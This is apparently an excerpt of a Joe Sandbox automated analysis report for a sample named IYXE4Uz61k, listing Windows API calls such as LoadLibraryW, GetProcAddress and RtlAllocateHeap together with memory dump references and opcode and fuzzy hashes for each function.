                                                                                                                                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2718869927-0
                                                                                                                                                                                                    • Opcode ID: 5cfc9698c2f74343f150688c7d65dc1c997c2032ccd7093f92e7bcda8b76bb7b
                                                                                                                                                                                                    • Instruction ID: 389fc58ba3504a09a7266a8ffdd1f834faddf37e289e95280476653f5f805a44
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cfc9698c2f74343f150688c7d65dc1c997c2032ccd7093f92e7bcda8b76bb7b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73E092B2400248A6DF02BB68DC06FDE3B6CBB15785F044951B204DB0A3EA78EA10C766
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00880836
                                                                                                                                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087F2D8,Crypt32.dll,00000000,0087F35C,?,?,0087F33E,?,?,?), ref: 00880858
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1175261203-0
                                                                                                                                                                                                    • Opcode ID: 75f8d3f29dc35a33b7cb129e37605344eff945c5aa3ecc483401af6c572f5c4d
                                                                                                                                                                                                    • Instruction ID: eeae13f2af2646b70a5bc11644924ce57acaafdf14fb235e4adf7df805500ef9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75f8d3f29dc35a33b7cb129e37605344eff945c5aa3ecc483401af6c572f5c4d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2E04F76800128ABDB11ABA4DC09FDB7BACFF0A3D1F040065B649E2004DAB4DA84CBB0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0088A3DA
                                                                                                                                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0088A3E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1918208029-0
                                                                                                                                                                                                    • Opcode ID: b1c81fcac320c3061ce66bc407017af3c99926c3e67e6502646f195873617440
                                                                                                                                                                                                    • Instruction ID: 2d71e0f086d93930a4d533cace9221fe1a94c066163cc79b524d69fa01e35e6b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1c81fcac320c3061ce66bc407017af3c99926c3e67e6502646f195873617440
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06E0ED71500218EBDB54EF99C5416A9BBE8FB05364F10805AA846E3741E3B4AE04DB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00892BAA
                                                                                                                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00892BB5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1660781231-0
                                                                                                                                                                                                    • Opcode ID: 2f20c7be89533fe01e6d199f2485520f43496a2400bc520db22860196b8613b4
                                                                                                                                                                                                    • Instruction ID: 6af7b00ea0f046bd0ce80c376f7aca8636defa27fbd03655c2735872e3f1b587
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f20c7be89533fe01e6d199f2485520f43496a2400bc520db22860196b8613b4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CD02235558700B85C147E78281345833C5FEA2B79BAC47CAF030C5AC1EE148440E013
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemShowWindow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3351165006-0
                                                                                                                                                                                                    • Opcode ID: d4bd713a5ae9938c76f18f6b8fba498fbbc8ee1df2472df3d5007004b16fb0d0
                                                                                                                                                                                                    • Instruction ID: a016eba16de77d794524c28af1d27cc70887604f2177cea631ee6c9d4eaff8c8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4bd713a5ae9938c76f18f6b8fba498fbbc8ee1df2472df3d5007004b16fb0d0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33C0123205C202BECF021BB4DC09C2BBBA8BBA6312F04CA0AB0A5C0060C238C210DB12
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: 2553c146421d09d246fe1b1e085a6f191c7db58d164fb625233131ae3a5f6b43
                                                                                                                                                                                                    • Instruction ID: 429ba8adb9c812e090cd16b59592b6c9ec1e97cd968a5a16cdfd4b2eca455492
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2553c146421d09d246fe1b1e085a6f191c7db58d164fb625233131ae3a5f6b43
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BC18330A002549FEF25CF6CC498BA97BA5FF55310F1881B9EC49DBA9ADB30D944CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: f5580cf345b5695b8b229408d3f899b364ba85342636cbe2414ff26099c9a42b
                                                                                                                                                                                                    • Instruction ID: edb40a9151009a50b4a0b52f436b93f1579e07696d7cab14f49444501a427480
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5580cf345b5695b8b229408d3f899b364ba85342636cbe2414ff26099c9a42b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B271A071500B449EDB35EB78C8559E7B7E9FB14300F40892EE1AFC7645DA32A684EF12
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00878289
                                                                                                                                                                                                      • Part of subcall function 008713DC: __EH_prolog.LIBCMT ref: 008713E1
                                                                                                                                                                                                      • Part of subcall function 0087A56D: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0087A598
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog$CloseFind
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2506663941-0
                                                                                                                                                                                                    • Opcode ID: 4e1d9ac27d1b4eb3c89a17f2e60a0982861c31a362bc4b424462cea2d8a724e1
                                                                                                                                                                                                    • Instruction ID: dfa4815d2eeae0b80e4ab866e9f5908589a07ad98073fcf131cb168f708d7a7e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e1d9ac27d1b4eb3c89a17f2e60a0982861c31a362bc4b424462cea2d8a724e1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9341C9719446589ADB20EB68CC59AE9B368FF00304F4484EAE08EE7197EB759EC4CB51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 008713E1
                                                                                                                                                                                                      • Part of subcall function 00875E37: __EH_prolog.LIBCMT ref: 00875E3C
                                                                                                                                                                                                      • Part of subcall function 0087CE40: __EH_prolog.LIBCMT ref: 0087CE45
                                                                                                                                                                                                      • Part of subcall function 0087B505: __EH_prolog.LIBCMT ref: 0087B50A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: c1d904bae82b0f11b403a2e3747e63b0ce8af19e3f69a19b0200f4b233bd5837
                                                                                                                                                                                                    • Instruction ID: 3803b1f61a2e69a1879eb7e5b8ee20755c375fb9b60ced5ad8334c6b0b52f13c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1d904bae82b0f11b403a2e3747e63b0ce8af19e3f69a19b0200f4b233bd5837
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 174146B0905B409AE724DF3D8885AE6FAE5FF19310F54492EE5EEC3282CB316654CB11
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 008713E1
                                                                                                                                                                                                      • Part of subcall function 00875E37: __EH_prolog.LIBCMT ref: 00875E3C
                                                                                                                                                                                                      • Part of subcall function 0087CE40: __EH_prolog.LIBCMT ref: 0087CE45
                                                                                                                                                                                                      • Part of subcall function 0087B505: __EH_prolog.LIBCMT ref: 0087B50A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: 506b81ee529606d01cb632ffb15ba1acac9278d92c5086886bd54842f75c7d22
                                                                                                                                                                                                    • Instruction ID: 6f297627a2d4e30a9cb743da77e230d89e99322c8df6e0f2851c64742b60551a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 506b81ee529606d01cb632ffb15ba1acac9278d92c5086886bd54842f75c7d22
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC4146B0905B409AE724DF7D8885AE6FAE5FF19310F54492ED6EEC3282CB316654CB11
                                                                                                                                                                                                    APIs
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 470875ab59cf66812c7f544277f384db4f11f0954ec5b4851f766215cfaecc7f
• Instruction ID: 1f30deb5d9eaf98e3f0e0ab9eb578fb189c26fe9068d07bbd969a0a2442643cb
• Opcode Fuzzy Hash: 470875ab59cf66812c7f544277f384db4f11f0954ec5b4851f766215cfaecc7f
• Instruction Fuzzy Hash: B121E4B1E40216ABDB14EF7CCC4566A76A8FF18714F14013AA606EA781E7749A00C7A9
APIs
• __EH_prolog.LIBCMT ref: 0088B098
  • Part of subcall function 008713DC: __EH_prolog.LIBCMT ref: 008713E1
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: d889323a6fe18ee9f05797140923c2e967c3b8846338e505cbf1f25720c66f25
• Instruction ID: 7bbad3cc3af2853f0fa5c4f90e241f634c100891f83ed6ad685e2e3de41a220c
• Opcode Fuzzy Hash: d889323a6fe18ee9f05797140923c2e967c3b8846338e505cbf1f25720c66f25
• Instruction Fuzzy Hash: 1A318A75814249EACF15EFA8C8559EEBBB4FF59304F10449EE409F7242DB35AE04CBA2
APIs
• GetProcAddress.KERNEL32(00000000,?), ref: 0089ACF8
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0
• Opcode ID: 1443176cf0baa04679802ab9b5d5ed41009b9b020fa2710de75ec0feb6c9ecc3
• Instruction ID: 22ef03837091b67a46cf4d05e3d5848b4b58de1439e34b58ef2de618211812c4
• Opcode Fuzzy Hash: 1443176cf0baa04679802ab9b5d5ed41009b9b020fa2710de75ec0feb6c9ecc3
• Instruction Fuzzy Hash: EE11A333A006256FAF2AAE28EC4095A7395FB8536971E4620FD15EB654D730DC01C7D2
APIs
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 0486d031bbaec7b43b0f54753f6894bca1e51462bd4c2c0295a4afef0df37099
• Instruction ID: 23cdee8ecad9ebbd6d0fd4212657c05bbddc0eb3e8e8288bebe1394e0fd6b1f7
• Opcode Fuzzy Hash: 0486d031bbaec7b43b0f54753f6894bca1e51462bd4c2c0295a4afef0df37099
• Instruction Fuzzy Hash: 10015633910528ABCF12FBACCC819DEB735FF88750B018565E869F7256DA34CD04C6A1
APIs
• __EH_prolog.LIBCMT ref: 0088DA57
  • Part of subcall function 00880659: _wcslen.LIBCMT ref: 0088066F
  • Part of subcall function 00877B0D: __EH_prolog.LIBCMT ref: 00877B12
Similarity
• API ID: H_prolog$_wcslen
• String ID:
• API String ID: 2838827086-0
• Opcode ID: 17f1c07b14f19664b9e60e24b7be5a130b47b06cbe4c5239c70fcf67214d3a33
• Instruction ID: 5712a26dc39df7b1f137964a83c4f78920a0d243472a362991a9b61cca3b4007
• Opcode Fuzzy Hash: 17f1c07b14f19664b9e60e24b7be5a130b47b06cbe4c5239c70fcf67214d3a33
• Instruction Fuzzy Hash: 0A11EB71508244EED711EB9CA816FDC7BB4FB25310F0081AEF254D2392DBB55654CB62
APIs
  • Part of subcall function 0089B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00899813,00000001,00000364,?,008940EF,?,?,008B1098), ref: 0089B177
• _free.LIBCMT ref: 0089C4E5
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
• Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
• Instruction ID: d8863af7908ed42d226c7abf0c348dbd74f4b7e4c939cd649bbe2dcf408b76a0
• Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
• Instruction Fuzzy Hash: F80149722003056BEB319F69DC8196AFBECFB85370F29051DE184C32C1EA31A805C778
APIs
• __EH_prolog.LIBCMT ref: 00877B12
  • Part of subcall function 0087CE40: __EH_prolog.LIBCMT ref: 0087CE45
  • Part of subcall function 00882089: __EH_prolog.LIBCMT ref: 0088208E
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: 3932ebc0c403eac80af803ce7a82305a5155a70152689f0d98f8a2b54887cd3b
                                                                                                                                                                                                    • Instruction ID: e57546e05e6dcbfb00952eba93e91f01fbd9346634599d3b111bdc7e5bda523c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3932ebc0c403eac80af803ce7a82305a5155a70152689f0d98f8a2b54887cd3b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B0180716107459BEB24DFB8C4417AEB6F4FF08365F10892EE05AE3280D7B49904C761
APIs
• RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00899813,00000001,00000364,?,008940EF,?,?,008B1098), ref: 0089B177
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 4b3e5ede0fcf94d2508b8ffcf8ffb357aba480dadb0db37b97243348596813c9
• Instruction ID: 3fbf9c775bcf6392a35af28645fb0b9c36ce71aa8d9d0d0c20932ef9be3a2c7b
• Opcode Fuzzy Hash: 4b3e5ede0fcf94d2508b8ffcf8ffb357aba480dadb0db37b97243348596813c9
• Instruction Fuzzy Hash: 95F08932505129B7EF217A65BE15B9F7749FF51770B1C8222FC08E7190DB60DD0186E1
APIs
• GetProcAddress.KERNEL32(00000000,?), ref: 00893C3F
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0
• Opcode ID: d08ed85dfdc318361b3161e029a7ce23a9e850f7798d0aaccabd307c1a663f27
• Instruction ID: 224c3b543ef184bd1ad4ac881b836dbfac0a7e815fed91cf63dfa2ec863d9e96
• Opcode Fuzzy Hash: d08ed85dfdc318361b3161e029a7ce23a9e850f7798d0aaccabd307c1a663f27
• Instruction Fuzzy Hash: 3AF0E532204A169FCF11AEA8EC0499A77A9FF11B287184125FA05E7190DB31DA20C790
APIs
• RtlAllocateHeap.NTDLL(00000000,?,?,?,00894286,?,0000015D,?,?,?,?,00895762,000000FF,00000000,?,?), ref: 00898E38
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: a3eaddae738e1b11553c1b3a78a597977470db21b869c36fdab132ec512ca6d7
• Instruction ID: 1f1b81857cd3afb7eca6d0db729799663197b2bde35990db9723b6615af654d2
• Opcode Fuzzy Hash: a3eaddae738e1b11553c1b3a78a597977470db21b869c36fdab132ec512ca6d7
• Instruction Fuzzy Hash: F4E03031206227D7EE7136799C15B9F7648FB537A4B1D0111AC58D6091DF20CC0092A1
APIs
• __EH_prolog.LIBCMT ref: 00875AC2
  • Part of subcall function 0087B505: __EH_prolog.LIBCMT ref: 0087B50A
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
